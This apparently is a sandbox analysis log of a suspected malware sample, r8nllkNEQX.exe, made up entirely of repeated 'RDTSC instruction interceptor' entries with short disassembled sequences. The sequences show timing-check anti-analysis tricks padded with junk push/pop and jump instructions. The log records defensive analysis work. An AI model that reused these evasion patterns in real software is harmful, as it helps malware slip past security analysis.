Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BA3B second address: C2BA77 instructions: 0x00000000 rdtsc 0x00000002 jo 00007FFB28DE2A06h 0x00000008 jmp 00007FFB28DE2A0Eh 0x0000000d pop edx 0x0000000e pop eax 0x0000000f popad 0x00000010 push eax 0x00000011 push edx 0x00000012 jo 00007FFB28DE2A25h 0x00000018 jmp 00007FFB28DE2A19h 0x0000001d push eax 0x0000001e push edx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BA77 second address: C2BA83 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 jne 00007FFB28B74666h 0x0000000b pop ecx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BA83 second address: C2BA8F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFB28DE2A06h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BA8F second address: C2BA93 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BC11 second address: C2BC15 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BC15 second address: C2BC1E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push ecx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BDA5 second address: C2BDC8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007FFB28DE2A13h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c jbe 00007FFB28DE2A06h 0x00000012 push eax 0x00000013 pop eax 0x00000014 pop edx 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BDC8 second address: C2BDE6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 jmp 00007FFB28B74675h 0x0000000a popad 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2BDE6 second address: C2BDEC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2C12A second address: C2C144 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B74674h 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2C144 second address: C2C14E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push esi 0x00000009 pop esi 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2FA12 second address: C2FA1C instructions: 0x00000000 rdtsc 0x00000002 jns 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C2FB92 second address: C2FB97 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C389D3 second address: C389D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C389D8 second address: C389EB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jng 00007FFB28DE2A06h 0x00000009 pushad 0x0000000a popad 0x0000000b js 00007FFB28DE2A06h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C389EB second address: C38A11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jnc 00007FFB28B74666h 0x0000000c push ecx 0x0000000d pop ecx 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007FFB28B7466Fh 0x0000001a pushad 0x0000001b popad 0x0000001c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C38A11 second address: C38A2C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A17h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C36AC2 second address: C36AE9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007FFB28B74666h 0x0000000a jmp 00007FFB28B74679h 0x0000000f popad 0x00000010 push edi 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C36AE9 second address: C36B29 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jnl 00007FFB28DE2A1Fh 0x0000000e jmp 00007FFB28DE2A19h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C36CC1 second address: C36CCB instructions: 0x00000000 rdtsc 0x00000002 jne 00007FFB28B74666h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C372B4 second address: C372BB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C372BB second address: C372C7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jp 00007FFB28B74666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C372C7 second address: C372CB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C37836 second address: C3784C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74672h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C3784C second address: C3785B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push ecx 0x00000008 pop ecx 0x00000009 pop esi 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C3785B second address: C37872 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74673h 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C37872 second address: C3787B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C3787B second address: C37891 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007FFB28B74666h 0x0000000a jmp 00007FFB28B7466Ah 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C37BC9 second address: C37BD3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop eax 0x00000005 push eax 0x00000006 pushad 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C383DA second address: C383E8 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C383E8 second address: C383F2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C386B9 second address: C386BF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C3D620 second address: C3D645 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A15h 0x00000007 push eax 0x00000008 push edx 0x00000009 js 00007FFB28DE2A06h 0x0000000f jne 00007FFB28DE2A06h 0x00000015 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C3D645 second address: C3D649 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C40711 second address: C40715 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C40715 second address: C40735 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B7466Bh 0x00000007 jmp 00007FFB28B74671h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C40735 second address: C4075A instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28DE2A0Eh 0x00000008 push eax 0x00000009 push edx 0x0000000a push ebx 0x0000000b pop ebx 0x0000000c jmp 00007FFB28DE2A11h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4075A second address: C4075E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C40ED6 second address: C40EF6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 jo 00007FFB28DE2A06h 0x00000009 pop ecx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e js 00007FFB28DE2A0Eh 0x00000014 push ecx 0x00000015 push ecx 0x00000016 pop ecx 0x00000017 pop ecx 0x00000018 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C41055 second address: C41059 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C41308 second address: C4131A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ecx 0x00000009 pushad 0x0000000a popad 0x0000000b pop ecx 0x0000000c pop ecx 0x0000000d push eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push esi 0x00000011 pop esi 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48547 second address: C4854F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4854F second address: C48553 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48835 second address: C4883B instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 pop edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48AD6 second address: C48ADC instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48ADC second address: C48AE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push esi 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48AE5 second address: C48B04 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jp 00007FFB28DE2A06h 0x0000000c pop edx 0x0000000d popad 0x0000000e push ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 jmp 00007FFB28DE2A0Ch 0x00000018 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48CA5 second address: C48CB4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Bh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48CB4 second address: C48CCB instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 jmp 00007FFB28DE2A0Dh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C48CCB second address: C48CCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4993A second address: C4994E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop eax 0x00000007 pushad 0x00000008 pushad 0x00000009 popad 0x0000000a pushad 0x0000000b popad 0x0000000c jg 00007FFB28DE2A06h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4A01E second address: C4A024 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4A024 second address: C4A035 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 push edx 0x00000008 jng 00007FFB28DE2A06h 0x0000000e pushad 0x0000000f popad 0x00000010 pop edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4A035 second address: C4A03A instructions: 0x00000000 rdtsc 0x00000002 push edx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4A03A second address: C4A044 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4A044 second address: C4A050 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007FFB28B74666h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C47EE7 second address: C47EEB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C47EEB second address: C47EF6 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push ebx 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4DF94 second address: C4DFB3 instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 pop ebx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A0Ch 0x0000000d jmp 00007FFB28DE2A0Bh 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4DFB3 second address: C4DFB7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C4DFB7 second address: C4DFBD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C51C75 second address: C51C79 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C5BE29 second address: C5BE2F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C5BE2F second address: C5BE41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007FFB28B7466Eh 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C6101B second address: C6103B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ch 0x00000007 jmp 00007FFB28DE2A0Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C635B1 second address: C635BE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop ebx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a popad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C635BE second address: C635C2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C66C53 second address: C66C57 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C66C57 second address: C66C5D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9A22D second address: B9A233 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9A233 second address: B9A24D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A16h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9A24D second address: B9A26C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007FFB28B7466Dh 0x00000009 jmp 00007FFB28B7466Eh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9A26C second address: B9A292 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A0Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007FFB28DE2A12h 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: B9A292 second address: B9A296 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C731EC second address: C7320D instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007FFB28DE2A18h 0x0000000b push ebx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7303C second address: C7304C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 je 00007FFB28B74666h 0x0000000a jc 00007FFB28B74666h 0x00000010 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7304C second address: C73050 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C749A4 second address: C749A8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C749A8 second address: C749AC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C775D9 second address: C775F7 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28B74676h 0x0000000d rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C775F7 second address: C77620 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28DE2A18h 0x00000007 jmp 00007FFB28DE2A0Dh 0x0000000c pop edx 0x0000000d pop eax 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C77620 second address: C7764E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74675h 0x00000007 push eax 0x00000008 push edx 0x00000009 jmp 00007FFB28B74675h 0x0000000e rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7F1B2 second address: C7F1BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7F1BA second address: C7F1D5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push eax 0x00000008 je 00007FFB28B74666h 0x0000000e pushad 0x0000000f popad 0x00000010 pop eax 0x00000011 popad 0x00000012 pushad 0x00000013 jc 00007FFB28B7466Eh 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C7F1D5 second address: C7F1F1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 push eax 0x00000007 push edx 0x00000008 jmp 00007FFB28DE2A0Eh 0x0000000d jbe 00007FFB28DE2A06h 0x00000013 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803BF second address: C803C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803C5 second address: C803D8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 jmp 00007FFB28DE2A0Ch 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803D8 second address: C803FA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007FFB28B74678h 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C803FA second address: C80404 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007FFB28DE2A06h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C80404 second address: C80435 instructions: 0x00000000 rdtsc 0x00000002 jno 00007FFB28B74666h 0x00000008 jl 00007FFB28B74666h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 popad 0x00000011 js 00007FFB28B7468Ch 0x00000017 je 00007FFB28B74676h 0x0000001d push eax 0x0000001e push edx 0x0000001f push ecx 0x00000020 pop ecx 0x00000021 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C83D90 second address: C83D94 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C83D94 second address: C83D98 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: C83D98 second address: C83D9E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FC8 second address: CC0FD4 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007FFB28B74666h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FD4 second address: CC0FDB instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push esi 0x00000004 pop esi 0x00000005 push eax 0x00000006 push edx 0x00000007 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FDB second address: CC0FE4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edi 0x00000005 push eax 0x00000006 push edx 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC0FE4 second address: CC0FEA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\r8nllkNEQX.exeRDTSC instruction interceptor: First address: CC4038 second address: CC403E instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
